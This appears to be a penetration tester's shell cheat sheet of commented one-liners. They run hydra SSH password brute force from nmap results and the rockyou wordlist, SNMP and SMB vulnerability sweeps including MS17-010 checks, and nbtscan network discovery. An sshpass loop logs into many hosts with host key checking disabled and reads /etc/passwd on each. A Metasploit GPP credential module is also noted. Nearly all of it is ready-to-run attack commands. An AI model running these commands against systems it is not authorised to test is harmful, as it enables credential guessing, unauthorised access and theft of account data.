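# Read all .gnmap files and try the given user/password on every host with SSH (22) open.
# The leading space in the pattern keeps 122/open or 2222/open from matching, and sort -u
# gives each host one attempt even when it appears in several .gnmap files.
mapfile -t hosts < <(grep -h ' 22/open' -- */*.gnmap | cut -d' ' -f2 | sort -u)
for host in "${hosts[@]}"; do
  hydra -l USER -p PASSWD -I -t 1 -W 2 "ssh://$host"
done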
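# Read hydra output and print the IP addresses (3rd column) of the lines that report
# a valid user/password. Reads the file directly and uses grep -E: egrep is deprecated
# and prints a warning on recent GNU grep.
grep -E "22|ssh|host:|login|password" hydra_ssh \
  | grep -Ev "0 valid|DATA|completed|Hydra|does not|Timeout|ERROR" \
  | awk '{ print $3 }'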
# Hydra brute-force against a single SSH target: one user (-l), a password list (-P),
# 5 parallel tasks (-t), 2 s between connects per task (-W), ignore an existing
# restore file (-I), print every attempt (-Vv). Each attempt is normally logged by
# sshd on the target, so expect lockouts or rate limiting.
hydra -l testuser -P /usr/share/wordlists/rockyou.txt -I -W 2 -t 5 ssh://10.0.0.1 -Vv
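# Read all .gnmap files and collect SNMP information from every host with 161 open,
# one output file per host under ../snmp-info/. The leading space in the pattern
# keeps e.g. 1161/open from matching; sort -u queries each host once.
mapfile -t hosts < <(grep -h ' 161/open' -- */*.gnmap | cut -d' ' -f2 | sort -u)
for host in "${hosts[@]}"; do
  snmp-check "$host" -t 3 -r 1 > "../snmp-info/$host"
done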
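# Read all .gnmap files and run the smb-vuln-* NSE scripts against every host with 445 open,
# results under ../smb-vuln/. The script pattern is quoted so the shell cannot expand it
# against files in the current directory before nmap sees it.
mapfile -t hosts < <(grep -h ' 445/open' -- */*.gnmap | cut -d' ' -f2 | sort -u)
for host in "${hosts[@]}"; do
  nmap -p445 --script 'smb-vuln-*' -Pn -n "$host" --open -oA "../smb-vuln/$host"
done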
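# Nbtscan the target network into nbtscan.txt (default 10.0.0.0/24; override with NBT_NET=...).
nbtscan -r "${NBT_NET:-10.0.0.0/24}" > nbtscan.txt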
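# Read nbtscan results and check every listed host for MS17-010 on port 445.
# Only lines that start with an IPv4 address are used, so header or separator lines
# in the nbtscan output do not become nmap targets; the script glob is quoted so the
# shell cannot expand it.
mapfile -t ips < <(awk '/^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/ { print $1 }' nbtscan.txt)
for ip in "${ips[@]}"; do
  nmap -n -Pn --open -p445 "$ip" --script 'smb-vuln-ms17*'
done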
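# Print every */live.txt that exists but is empty (size 0).
# Tests the file with -s instead of parsing ls: the old grep -o "0" also matched
# any size containing a zero digit, such as 1024.
for f in */live.txt; do
  if [[ -f "$f" && ! -s "$f" ]]; then printf '%s\n' "$f"; fi
done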
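# Run '/bin/cat /etc/passwd && hostname && id' on every host in ssh_host_list.txt,
# one output file per host under sshpass_dir/.
# The password is handed over through SSHPASS (-e) rather than -p, so it is not part
# of the command line. StrictHostKeyChecking=no accepts any host key, so these
# sessions can be intercepted; it is kept here because the original relies on it.
mapfile -t hosts < ssh_host_list.txt
for host in "${hosts[@]}"; do
  [[ -n "$host" ]] || continue
  SSHPASS='password' sshpass -e ssh -o StrictHostKeyChecking=no "USER@$host" "/bin/cat /etc/passwd && hostname && id" > "sshpass_dir/$host"
done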
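# Print every regular file in the current directory that contains the string 'admin'.
# Globs the directory instead of parsing ls -l (which breaks on names with spaces),
# skips directories explicitly, and drops the unused size lookup.
for file in *; do
  [[ -f "$file" ]] || continue
  if grep -q -- 'admin' "$file"; then printf '%s\n' "$file"; fi
done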
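# Remove every directory in the current directory whose live.txt exists but is empty.
# Checks the file directly instead of grepping ls -l, which also matched names such as
# live.txt.bak and could compare a multi-line size list against 0. Only directories
# are considered, and the name is quoted with -- so rm never sees a stray word.
for dir in */; do
  dir=${dir%/}
  if [[ -f "$dir/live.txt" && ! -s "$dir/live.txt" ]]; then rm -rf -- "$dir"; fi
done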
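# Print the IP address(es) of every name server of the given domain, one line per NS
# ("<addresses> <ns>"). dig +short already returns the NS names alone, so the
# grep/awk/sed chain (whose unquoted "$domain." let the dot match any character)
# is not needed; the trailing dot is stripped with a parameter expansion.
domain="twitter.com"
mapfile -t nameservers < <(dig +short "$domain" NS)
for ns in "${nameservers[@]}"; do
  ns=${ns%.}
  mapfile -t addrs < <(dig +short "$ns")
  printf '%s %s\n' "${addrs[*]}" "$ns"
done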
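# Domain GPP module: this is a note, not a shell command; run it from inside msfconsole.
# Kept as a comment so that sourcing this file does not start msfconsole with stdout
# redirected into a file named scanner/smb/smb_enum_gpp.
#   msfconsole -> scanner/smb/smb_enum_gpp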